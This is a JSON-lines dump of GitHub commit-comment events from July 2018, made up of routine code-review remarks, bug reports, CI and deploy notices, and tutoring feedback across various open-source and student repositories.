{"id":"7948566727","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/review"},"payload":{"comment":{"id":29667751,"position":null,"line":null,"path":null,"commit_id":"6144296611b3148bf474cf7b006c7f845089ab5c","created_at":"2018-07-11T08:34:22Z","updated_at":"2018-07-11T08:34:22Z","author_association":"MEMBER","body":"To make the dash green! ;)"}},"created_at":"2018-07-11T08:34:22Z"}
{"id":"7948567411","type":"CommitCommentEvent","actor":{"login":"raarts1995"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29667752,"position":null,"line":null,"path":null,"commit_id":"b0c6991bcf6f5ae76a28bc697989814146ed1066","created_at":"2018-07-11T08:34:30Z","updated_at":"2018-07-11T08:34:30Z","author_association":"NONE","body":"After this update, my sketch stopped working properly. I use the webserver to send an html file, a css file and a js file, loaded from the SPIFFS to a connected client. The html file gets loaded first and loads properly, but for the other two files I often get a connection_reset error in the webbrowser. I assume this happens when a new request is sent to the esp while the previous request wasn't completed yet. "}},"created_at":"2018-07-11T08:34:30Z"}
{"id":"7948567982","type":"CommitCommentEvent","actor":{"login":"ggospodinov"},"repo":{"name":"ggospodinov/ggospodinov.github.io"},"payload":{"comment":{"id":29667753,"position":null,"line":null,"path":null,"commit_id":"5873e1cccc0190381c813faf65886eb62e990f65","created_at":"2018-07-11T08:34:37Z","updated_at":"2018-07-11T08:34:37Z","author_association":"OWNER","body":"My project"}},"created_at":"2018-07-11T08:34:37Z"}
{"id":"7948571070","type":"CommitCommentEvent","actor":{"login":"vlachoudis"},"repo":{"name":"vlachoudis/bCNC"},"payload":{"comment":{"id":29667762,"position":null,"line":null,"path":null,"commit_id":"1e0d58222d278d0ef29c6bae1ef4a3e9131ea690","created_at":"2018-07-11T08:35:14Z","updated_at":"2018-07-11T08:35:14Z","author_association":"OWNER","body":"Don't worry bCNC will always be free, with an equivalent license like the one up to now. This specific was the one proposed by github, and I am trying to understand the differences, between the various versions before selecting which one"}},"created_at":"2018-07-11T08:35:14Z"}
{"id":"7948571455","type":"CommitCommentEvent","actor":{"login":"nearpins"},"repo":{"name":"nearpins/laravel-web"},"payload":{"comment":{"id":29667763,"position":null,"line":null,"path":null,"commit_id":"1deb3d03e7f1751b13e07d065364b7412751a343","created_at":"2018-07-11T08:35:18Z","updated_at":"2018-07-11T08:35:18Z","author_association":"OWNER","body":" php artisan key:generate"}},"created_at":"2018-07-11T08:35:18Z"}
{"id":"7948572133","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/maraevelin"},"payload":{"comment":{"id":29667767,"position":65,"line":12,"path":"week-08/day-05/reddit/src/main/java/com/greenfoxacademy/reddit/services/PostServiceImpl.java","commit_id":"769bff71da84f30bec431e804118c2a9c7683f12","created_at":"2018-07-11T08:35:26Z","updated_at":"2018-07-11T08:35:26Z","author_association":"NONE","body":"Always good to see service layer 🥇 "}},"created_at":"2018-07-11T08:35:26Z"}
{"id":"7948575644","type":"CommitCommentEvent","actor":{"login":"ara4n"},"repo":{"name":"matrix-org/matrix-react-sdk"},"payload":{"comment":{"id":29667771,"position":82,"line":316,"path":"src/components/views/rooms/MessageComposerInput.js","commit_id":"5e3a7e45c5c788581a14b05cfc45d8deee4ba0b1","created_at":"2018-07-11T08:36:09Z","updated_at":"2018-07-11T08:36:09Z","author_association":"MEMBER","body":"we can remove the //eslint now"}},"created_at":"2018-07-11T08:36:09Z"}
{"id":"7948576070","type":"CommitCommentEvent","actor":{"login":"lintho"},"repo":{"name":"nopSolutions/nopCommerce"},"payload":{"comment":{"id":29667773,"position":null,"line":null,"path":null,"commit_id":"377d7d900a97cd40cd4b4bd6e8b6f3a02705366f","created_at":"2018-07-11T08:36:13Z","updated_at":"2018-07-11T08:36:13Z","author_association":"NONE","body":"Oh, this forced me to update every custom service ive made. \r\n\r\nAre there any shortcuts in VS 2017 to include  \" : base(services) \" automatically in the correct order?"}},"created_at":"2018-07-11T08:36:13Z"}
{"id":"7948583685","type":"CommitCommentEvent","actor":{"login":"qyf94"},"repo":{"name":"qyf94/vue-scratchcard"},"payload":{"comment":{"id":29667786,"position":null,"line":null,"path":null,"commit_id":"c7fe227b3d799c938b685ecdfefb705e70c64c0b","created_at":"2018-07-11T08:37:45Z","updated_at":"2018-07-11T08:37:45Z","author_association":"OWNER","body":"之前的版本在设置 finishPercent 为 100 的时候是没有问题的，但是这个值如果小于 100，比如说设置 80，在刮到80%的时候已经调了 reveal( )，已经是完全刮开的状态，但是如果没有抬起手继续移动的话，还可以监听到\r\n touchmove 事件，所以还会调 reveal( )，所以会报 Cannot read property 'removeChild' of null ，但是如果是监听 mousemove 事件的话是没有问题的\r\n\r\n总结起来就是 finishPercent 小于 100，并且在移动端才会出现这个问题"}},"created_at":"2018-07-11T08:37:45Z"}
{"id":"7948585460","type":"CommitCommentEvent","actor":{"login":"t3chguy"},"repo":{"name":"matrix-org/matrix-react-sdk"},"payload":{"comment":{"id":29667789,"position":82,"line":316,"path":"src/components/views/rooms/MessageComposerInput.js","commit_id":"5e3a7e45c5c788581a14b05cfc45d8deee4ba0b1","created_at":"2018-07-11T08:38:05Z","updated_at":"2018-07-11T08:38:05Z","author_association":"COLLABORATOR","body":"Done. Thanks"}},"created_at":"2018-07-11T08:38:05Z"}
{"id":"7948590607","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29667798,"position":15,"line":8,"path":"Rakefile","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-11T08:39:06Z","updated_at":"2018-07-11T08:39:06Z","author_association":"MEMBER","body":"Minor minor! Could be `task default: :spec` unless we feel a need to support older ruby versions (< 1.9?)."}},"created_at":"2018-07-11T08:39:06Z"}
{"id":"7948592787","type":"CommitCommentEvent","actor":{"login":"kismocyp"},"repo":{"name":"cy-4/site-coding-club"},"payload":{"comment":{"id":29667802,"position":null,"line":null,"path":null,"commit_id":"e026b512cdb84409be26789a5747714e4ae516a8","created_at":"2018-07-11T08:39:31Z","updated_at":"2018-07-11T08:39:31Z","author_association":"COLLABORATOR","body":"trop nul comme changement"}},"created_at":"2018-07-11T08:39:31Z"}
{"id":"7948593276","type":"CommitCommentEvent","actor":{"login":"t3chguy"},"repo":{"name":"matrix-org/matrix-react-sdk"},"payload":{"comment":{"id":29667803,"position":82,"line":316,"path":"src/components/views/rooms/MessageComposerInput.js","commit_id":"5e3a7e45c5c788581a14b05cfc45d8deee4ba0b1","created_at":"2018-07-11T08:39:37Z","updated_at":"2018-07-11T08:39:37Z","author_association":"COLLABORATOR","body":"also just noticed a bunch of undesired things in this commit, pulled them back out"}},"created_at":"2018-07-11T08:39:37Z"}
{"id":"7948595879","type":"CommitCommentEvent","actor":{"login":"fgi-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":29667808,"position":null,"line":null,"path":null,"commit_id":"f89d4201c779d68d584533e62b209ccf6bd16f84","created_at":"2018-07-11T08:40:09Z","updated_at":"2018-07-11T08:40:09Z","author_association":"CONTRIBUTOR","body":"@nim-odoo This setting shouldn't be hidden. How can a user change the default invoicing policy for new products then? It implies a lot. Instead if \"Based on delivered quantity\" is chosen in the settings, the default invoicing policy of service products should be \"Timesheet on tasks\": https://drive.google.com/a/odoo.com/file/d/1cfjPSOzJfub602GaOtXWPr_wp-xon0xM/view?usp=drivesdk"}},"created_at":"2018-07-11T08:40:09Z"}
{"id":"7948597162","type":"CommitCommentEvent","actor":{"login":"mynamezxc"},"repo":{"name":"mynamezxc/zxc_framework"},"payload":{"comment":{"id":29667809,"position":null,"line":null,"path":null,"commit_id":"78b2edc4a61272d191dd754c045c9a3489d868cc","created_at":"2018-07-11T08:40:23Z","updated_at":"2018-07-11T08:40:23Z","author_association":"OWNER","body":"# update model using object\r\n# update composer and using disks for require ratchet"}},"created_at":"2018-07-11T08:40:23Z"}
{"id":"7948598471","type":"CommitCommentEvent","actor":{"login":"bh-e"},"repo":{"name":"spring-projects/spring-framework"},"payload":{"comment":{"id":29667813,"position":null,"line":null,"path":null,"commit_id":"323ccf99e575343f63d56e229c25c35c170b7ec1","created_at":"2018-07-11T08:40:38Z","updated_at":"2018-07-11T08:40:38Z","author_association":"NONE","body":"Hello. \r\n\r\nIs this commit related to CVE-2018-11039 ? "}},"created_at":"2018-07-11T08:40:38Z"}
{"id":"7948602681","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/maraevelin"},"payload":{"comment":{"id":29667817,"position":81,"line":28,"path":"week-08/day-05/reddit/src/main/java/com/greenfoxacademy/reddit/services/PostServiceImpl.java","commit_id":"769bff71da84f30bec431e804118c2a9c7683f12","created_at":"2018-07-11T08:41:26Z","updated_at":"2018-07-11T08:41:26Z","author_association":"NONE","body":"\"Wait, what?\" Here you ask the repo to get everything from the database and put it back. I think the plan was a bit different. Maybe you wanted to get a list of `post`s as a parameter and save the whole list in one step. "}},"created_at":"2018-07-11T08:41:26Z"}
{"id":"7948603311","type":"CommitCommentEvent","actor":{"login":"dinphy"},"repo":{"name":"shenliyang/hexo-theme-snippet"},"payload":{"comment":{"id":29667818,"position":null,"line":null,"path":null,"commit_id":"bbfbf888767d5f3370d2d5eff61604fe520641f4","created_at":"2018-07-11T08:41:33Z","updated_at":"2018-07-11T08:41:33Z","author_association":"CONTRIBUTOR","body":"你这一修复，全局搜索不顶用了。"}},"created_at":"2018-07-11T08:41:33Z"}
{"id":"7948609231","type":"CommitCommentEvent","actor":{"login":"me-no-dev"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29667822,"position":null,"line":null,"path":null,"commit_id":"b0c6991bcf6f5ae76a28bc697989814146ed1066","created_at":"2018-07-11T08:42:40Z","updated_at":"2018-07-11T08:42:40Z","author_association":"MEMBER","body":"can you please pull the latest master and try again? I just pushed a couple of things last night"}},"created_at":"2018-07-11T08:42:40Z"}
{"id":"7948611395","type":"CommitCommentEvent","actor":{"login":"mikebell"},"repo":{"name":"alphagov/tech-docs-gem"},"payload":{"comment":{"id":29667826,"position":24,"line":19,"path":"lib/govuk_tech_docs/api_reference.rb","commit_id":"425ed9c8b5e7fe9ccc7c83107ba3fb298db0ef1a","created_at":"2018-07-11T08:43:04Z","updated_at":"2018-07-11T08:43:04Z","author_association":"NONE","body":"Not yet, I could always add a check in to see if the path has http/s:// in it and then switch how we load the file. How does that sound?"}},"created_at":"2018-07-11T08:43:04Z"}
{"id":"7948619300","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29667843,"position":5,"line":5,"path":"lib/bankline_csv_import_file/record.rb","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-11T08:44:32Z","updated_at":"2018-07-11T08:44:32Z","author_association":"MEMBER","body":"A bit of a magic number. The comment helps, but could/should we do more?"}},"created_at":"2018-07-11T08:44:32Z"}
{"id":"7948622337","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29667855,"position":null,"line":null,"path":null,"commit_id":"4172e1dd52f8728fa703838888c978caea8f4044","created_at":"2018-07-11T08:45:09Z","updated_at":"2018-07-11T08:45:09Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/recent-changes-to-api-requests/91967/5\n"}},"created_at":"2018-07-11T08:45:09Z"}
{"id":"7948622553","type":"CommitCommentEvent","actor":{"login":"DonghaoFeng"},"repo":{"name":"InterPSS-Project/ipss-common"},"payload":{"comment":{"id":29667856,"position":122,"line":122,"path":"ipss.tutorial/src/org/interpss/tutorial/ch5_dstab/DStab_IEEE9Bus_Test2.java","commit_id":"b24720737f94f5b3fe59e55136e533b1afa33938","created_at":"2018-07-11T08:45:11Z","updated_at":"2018-07-11T08:45:11Z","author_association":"CONTRIBUTOR","body":"please take a look"}},"created_at":"2018-07-11T08:45:11Z"}
{"id":"7948623372","type":"CommitCommentEvent","actor":{"login":"MohammedKaludi"},"repo":{"name":"ahmedkaludi/accelerated-mobile-pages"},"payload":{"comment":{"id":29667860,"position":null,"line":null,"path":null,"commit_id":"4f8aad5b6a7ea18ac4845fda469ba9f281b76d95","created_at":"2018-07-11T08:45:20Z","updated_at":"2018-07-11T08:45:20Z","author_association":"COLLABORATOR","body":"Use function_exists or class_exists in the place of is_plugin_active('wp-seopress/seopress.php')"}},"created_at":"2018-07-11T08:45:20Z"}
{"id":"7948624716","type":"CommitCommentEvent","actor":{"login":"t3chguy"},"repo":{"name":"matrix-org/matrix-react-sdk"},"payload":{"comment":{"id":29667863,"position":82,"line":316,"path":"src/components/views/rooms/MessageComposerInput.js","commit_id":"5e3a7e45c5c788581a14b05cfc45d8deee4ba0b1","created_at":"2018-07-11T08:45:35Z","updated_at":"2018-07-11T08:45:35Z","author_association":"COLLABORATOR","body":"replaced by https://github.com/matrix-org/matrix-react-sdk/pull/2049/commits/fd4f9679df7b035c0112dce135c47967713f9518"}},"created_at":"2018-07-11T08:45:35Z"}
{"id":"7948625993","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29667867,"position":5,"line":5,"path":"lib/bankline_csv_import_file/record.rb","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-11T08:45:48Z","updated_at":"2018-07-11T08:45:48Z","author_association":"MEMBER","body":"Maybe link to the definition/reference documentation?"}},"created_at":"2018-07-11T08:45:48Z"}
{"id":"7948631898","type":"CommitCommentEvent","actor":{"login":"JosseFra02"},"repo":{"name":"JosseFra02/Dev-c-"},"payload":{"comment":{"id":29667887,"position":null,"line":null,"path":null,"commit_id":"d1aba78d3159be3b6979905ca2a9545fb4098d2f","created_at":"2018-07-11T08:46:56Z","updated_at":"2018-07-11T08:46:56Z","author_association":"OWNER","body":"copy and paste this source code to your dev C++ dan run the program"}},"created_at":"2018-07-11T08:46:56Z"}
{"id":"7948632528","type":"CommitCommentEvent","actor":{"login":"kolyshkin"},"repo":{"name":"containerd/continuity"},"payload":{"comment":{"id":29667889,"position":24,"line":30,"path":"driver/driver_unix.go","commit_id":"504b584b3f936bf9fcfb7803536dc547d3415cc7","created_at":"2018-07-11T08:47:03Z","updated_at":"2018-07-11T08:47:03Z","author_association":"NONE","body":"If pathname is absolute, dirfd is ignored."}},"created_at":"2018-07-11T08:47:03Z"}
{"id":"7948632683","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/maraevelin"},"payload":{"comment":{"id":29667890,"position":12,"line":15,"path":"week-08/day-05/reddit/src/main/java/com/greenfoxacademy/reddit/controllers/PostController.java","commit_id":"a6a8fbcab624abfc37d845e8c526dcec66fabbaf","created_at":"2018-07-11T08:47:05Z","updated_at":"2018-07-11T08:47:05Z","author_association":"NONE","body":"The `postService` already contains a `PostRepository`. a controller should only contains services, and trough the service call the repository. "}},"created_at":"2018-07-11T08:47:05Z"}
{"id":"7948637440","type":"CommitCommentEvent","actor":{"login":"GamiiisKth"},"repo":{"name":"GamiiisKth/lcoco-toolchain"},"payload":{"comment":{"id":29667896,"position":null,"line":null,"path":null,"commit_id":"ba176a72e2436289b36ab2e154a3d852fd141398","created_at":"2018-07-11T08:48:00Z","updated_at":"2018-07-11T08:48:00Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/0b5461dc-e7b0-4d4e-b1d1-dae514c45f9f?env_id=ibm%3Ayp%3Aeu-de \"lcoco-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/668c7960-990d-4b62-bc8c-ffc62eb11a13?env_id=ibm%3Ayp%3Aeu-de \"lcoco-toolchain\") deployed [lcoco-toolchain](https://github.com/GamiiisKth/lcoco-toolchain/releases/tag/deploy-ibm-yp-eu-de-admin-lcoco.se-dev-20180711-084754 \"deploy-ibm-yp-eu-de-admin-lcoco.se-dev-20180711-084754\") to [dev](https://console.bluemix.net/apps/b456ddc6-614f-4d70-adda-a392af995101?env_id=ibm:yp:eu-de \"ibm:yp:eu-de:admin@lcoco.se:dev\"), including this commit"}},"created_at":"2018-07-11T08:48:00Z"}
{"id":"7948637504","type":"CommitCommentEvent","actor":{"login":"ivmai"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29667897,"position":4,"line":885,"path":"configure.ac","commit_id":"5d8db990f8b307f0f5f6a0f1939a52ba72190e14","created_at":"2018-07-11T08:48:01Z","updated_at":"2018-07-11T08:48:01Z","author_association":"NONE","body":"Fixed in upstream in a different way - 6a7af12c"}},"created_at":"2018-07-11T08:48:01Z"}
{"id":"7948641222","type":"CommitCommentEvent","actor":{"login":"tskogberg"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29667903,"position":21,"line":21,"path":"spec/bankline_csv_import_file_spec.rb","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-11T08:48:44Z","updated_at":"2018-07-11T08:48:44Z","author_association":"MEMBER","body":"Might have been true when they created the example? If they added the example in 2006 I mean. Back then they might have had 80 fields. 😄 "}},"created_at":"2018-07-11T08:48:44Z"}
{"id":"7948641934","type":"CommitCommentEvent","actor":{"login":"pschichtel"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29667904,"position":32,"line":642,"path":"src/library/scala/collection/IterableOnce.scala","commit_id":"ae50ed3bd0bb6ceb7594a4ba9e918caccc301a11","created_at":"2018-07-11T08:48:52Z","updated_at":"2018-07-11T08:48:52Z","author_association":"NONE","body":"there is no `start` parameter in this variant of `copyToArray`, I'd suggest something like \"starting from the beginning\""}},"created_at":"2018-07-11T08:48:52Z"}
{"id":"7948642658","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29667908,"position":10,"line":192,"path":"addons/stock/models/stock_package_level.py","commit_id":"06cc9385d270f80685c037aba3636fac2b10e0e5","created_at":"2018-07-11T08:49:00Z","updated_at":"2018-07-11T08:49:00Z","author_association":"NONE","body":"why not making it compute?"}},"created_at":"2018-07-11T08:49:00Z"}
{"id":"7948643584","type":"CommitCommentEvent","actor":{"login":"sle-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29667911,"position":29,"line":671,"path":"addons/stock/models/stock_picking.py","commit_id":"06cc9385d270f80685c037aba3636fac2b10e0e5","created_at":"2018-07-11T08:49:10Z","updated_at":"2018-07-11T08:49:10Z","author_association":"NONE","body":"another commit + a test ? :)"}},"created_at":"2018-07-11T08:49:10Z"}
{"id":"7948643948","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29667912,"position":10,"line":8,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"8396c41c0dc048a6c9f660c9c2ec463172302171","created_at":"2018-07-11T08:49:14Z","updated_at":"2018-07-11T08:49:14Z","author_association":"NONE","body":"Нет, всё-таки не очень понятно, видимо. Давай тогда переформлуируем так:\r\n```MySystem.myOut.myPrintln(\"Hello World\")``` - надо написать такой код, чтобы эта строка успешно скомпилировалась. В изначальном задании я просил тоже самое, только названия были в точности такими же, как в системных классах."}},"created_at":"2018-07-11T08:49:14Z"}
{"id":"7948645155","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/maraevelin"},"payload":{"comment":{"id":29667916,"position":24,"line":25,"path":"week-08/day-05/reddit/src/main/java/com/greenfoxacademy/reddit/controllers/PostController.java","commit_id":"a6a8fbcab624abfc37d845e8c526dcec66fabbaf","created_at":"2018-07-11T08:49:28Z","updated_at":"2018-07-11T08:49:28Z","author_association":"NONE","body":"I would change it to `postService.findAllByOrderByVotesDesc()` to avoid unnecessary multiple repository initialization. "}},"created_at":"2018-07-11T08:49:28Z"}
{"id":"7948649617","type":"CommitCommentEvent","actor":{"login":"novrain"},"repo":{"name":"ElemeFE/react-amap"},"payload":{"comment":{"id":29667923,"position":null,"line":null,"path":null,"commit_id":"2c6179a8eef81c9bb72dc9a8a617283a89d23a46","created_at":"2018-07-11T08:50:20Z","updated_at":"2018-07-11T08:50:20Z","author_association":"NONE","body":"请问这个修复有版本发布了么？谢谢。"}},"created_at":"2018-07-11T08:50:20Z"}
{"id":"7948652578","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29667927,"position":null,"line":null,"path":null,"commit_id":"a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce","created_at":"2018-07-11T08:50:55Z","updated_at":"2018-07-11T08:50:55Z","author_association":"NONE","body":"update-libraries (mbadams5) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-a98ed2a3d92eb6bdde60ab2eca85896d3253f5ce-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T08:50:55Z"}
{"id":"7948653667","type":"CommitCommentEvent","actor":{"login":"acr-varonis"},"repo":{"name":"flemmingss/DHCP_Scope_Manager"},"payload":{"comment":{"id":29667930,"position":null,"line":null,"path":null,"commit_id":"dc7dfff47d91a8a2f74becf1d1f691a9b8a3f7ca","created_at":"2018-07-11T08:51:08Z","updated_at":"2018-07-11T08:51:08Z","author_association":"NONE","body":"you should probably also fix a typo from scipt  to script"}},"created_at":"2018-07-11T08:51:08Z"}
{"id":"7948657153","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29667943,"position":3,"line":2,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T08:51:46Z","updated_at":"2018-07-11T08:51:46Z","author_association":"NONE","body":"Не нужно добавлять ридеры для существующих публичных методов. Ридеры нам нужны, что-бы читать значения инстэнс переменных извне класса. Ридер определяет метод. То есть, например, когда ты пишешь\r\n```\r\nattr_reader :station_first\r\n#это разворачивается в\r\ndef station_first\r\n   @station_first\r\nend\r\n```\r\nИнстэнс переменной ```@station_frist``` у нас нет (и не должно быть), так-что этот ридер будет всегда возвращать nil. Убирай"}},"created_at":"2018-07-11T08:51:46Z"}
{"id":"7948658284","type":"CommitCommentEvent","actor":{"login":"BaiLibl"},"repo":{"name":"BaiLibl/BaiLibl.github.io"},"payload":{"comment":{"id":29667945,"position":9,"line":38,"path":"_posts/2018-07-11-Keras网络结构可视化.md","commit_id":"287555226bacc9103c8e7905c495dba397d9f64b","created_at":"2018-07-11T08:51:59Z","updated_at":"2018-07-11T08:51:59Z","author_association":"OWNER","body":"add"}},"created_at":"2018-07-11T08:51:59Z"}
{"id":"7948658352","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.indexer"},"payload":{"comment":{"id":29667946,"position":null,"line":null,"path":null,"commit_id":"5a2ccc7858e48fadbe53098fa807f8f091f025f6","created_at":"2018-07-11T08:51:59Z","updated_at":"2018-07-11T08:51:59Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.indexer/9/violations\n```\nplone/indexer/tests.py:31:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/indexer/decorator.py:44:30: C812 missing trailing comma\nplone/indexer/wrapper.py:61:65: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-11T08:51:59Z"}
{"id":"7948659502","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29667948,"position":24,"line":13,"path":"Lesson 3/Station.rb","commit_id":"df7bf04e61a88f692993158f49fb328a67524fd2","created_at":"2018-07-11T08:52:13Z","updated_at":"2018-07-11T08:52:13Z","author_association":"NONE","body":"ну я писал \"чем плохо\"\r\nне то чтобы прям плохо, но для этого метода правильней названием иметь глагол\r\nэто вообще общая рекомендация - предпочитать глаголы, потому что методы оин обычно \"что-то делают\"\r\nи вторая рекомендация - стремиться к тому чтобы код читался просто как текст\r\n`station.arrival(train)` - это не текст, а набор трех существительных \"станция\", \"прибытие\", \"поезд\"... если совсем плохо с языком тебя конечно поймут наверное в англии ))) \r\nно `station.accept(train)` - \"станция приниает поезд\" как-то больше похоже на текст....\r\n"}},"created_at":"2018-07-11T08:52:13Z"}
{"id":"7948661822","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29667950,"position":51,"line":50,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T08:52:40Z","updated_at":"2018-07-11T08:52:40Z","author_association":"OWNER","body":"Mmmm... I don't think it's too bad. Also, each require statement costs gas: https://stackoverflow.com/questions/48077773/ethereum-solidity-does-require-use-any-gas :-)"}},"created_at":"2018-07-11T08:52:40Z"}
{"id":"7948663749","type":"CommitCommentEvent","actor":{"login":"dstillman"},"repo":{"name":"zotero/zotero"},"payload":{"comment":{"id":29667953,"position":null,"line":null,"path":null,"commit_id":"f7ab64bb503109ba11d4438f22fbac06b8d68e3a","created_at":"2018-07-11T08:53:01Z","updated_at":"2018-07-11T08:53:01Z","author_association":"MEMBER","body":"> Zotero Standalone is always online\r\n\r\nThat's not the case. It's not just the menu option in Firefox. The Mozilla function gets online/offline info from the system, and it can be useful to check that and display a better message. So if Electron gives us a way to check this we should revert this and reimplement it."}},"created_at":"2018-07-11T08:53:01Z"}
{"id":"7948664164","type":"CommitCommentEvent","actor":{"login":"Y-Less"},"repo":{"name":"pawn-lang/YSI-Includes"},"payload":{"comment":{"id":29667955,"position":null,"line":null,"path":null,"commit_id":"3baec21f8ca0bcf3c44473904fbc624145773a97","created_at":"2018-07-11T08:53:06Z","updated_at":"2018-07-11T08:53:06Z","author_association":"MEMBER","body":"I know, but I'm not (given something I saw the other day, I'm starting to think this is part of the Go mindset, stemming from Google's \"we're infalible, obey or leave\" approach to brace styles)."}},"created_at":"2018-07-11T08:53:06Z"}
{"id":"7948665694","type":"CommitCommentEvent","actor":{"login":"acpolatkan"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29667960,"position":12,"line":12,"path":"src/waveTemplates/CPRM_EA__Customer_Sales_Overview/dataflow/Customer_Sales_OverviewDataflow.json","commit_id":"a34906b226251aad180042d992d51ed02322c2ec","created_at":"2018-07-11T08:53:22Z","updated_at":"2018-07-11T08:53:22Z","author_association":"CONTRIBUTOR","body":"hmm seems like it still has the old dataflow in the org"}},"created_at":"2018-07-11T08:53:22Z"}
{"id":"7948666253","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29667963,"position":80,"line":69,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-11T08:53:28Z","updated_at":"2018-07-11T08:53:28Z","author_association":"OWNER","body":"True, not necessary"}},"created_at":"2018-07-11T08:53:28Z"}
{"id":"7948672987","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"aleksandrrusev/thinknetica"},"payload":{"comment":{"id":29667977,"position":1,"line":1,"path":"Lesson 3/station.rb","commit_id":"03d7eb608aea1d5a9e8655e60ed0fc439b54af28","created_at":"2018-07-11T08:54:45Z","updated_at":"2018-07-11T08:54:45Z","author_association":"NONE","body":"по этому классу я тебе уже два раза оставлял комментарий относительно 18 строки..."}},"created_at":"2018-07-11T08:54:45Z"}
{"id":"7948674835","type":"CommitCommentEvent","actor":{"login":"ccrs"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29667979,"position":null,"line":null,"path":null,"commit_id":"3963492bec37491cd6584c3deaa23f2b5c7fb1fa","created_at":"2018-07-11T08:55:05Z","updated_at":"2018-07-11T08:55:05Z","author_association":"CONTRIBUTOR","body":"be careful with the comments please, at least dont make em misleading\r\n\r\n```sql\r\n(22424,0,4,0,40,0,100,0,50,22424,0,0,0,54,5000,0,0,0,0,0,1,0,0,0,0,0,0,0,\"Skywing - On Waypoint 50 Reached - Run Script\"),\r\n```\r\n```c++\r\nSMART_ACTION_WP_PAUSE                           = 54,     // time\r\n```"}},"created_at":"2018-07-11T08:55:05Z"}
{"id":"7948675279","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"alexleskov/thinknetica-learning"},"payload":{"comment":{"id":29667981,"position":6,"line":5,"path":"Lesson3/route.rb","commit_id":"8bfa7bce833b38613c1e2f2bfe6dde0397b6f1d2","created_at":"2018-07-11T08:55:10Z","updated_at":"2018-07-11T08:55:10Z","author_association":"NONE","body":"В принципе у нас будет урок по ошибкам и там мы будем писать валидации. "}},"created_at":"2018-07-11T08:55:10Z"}
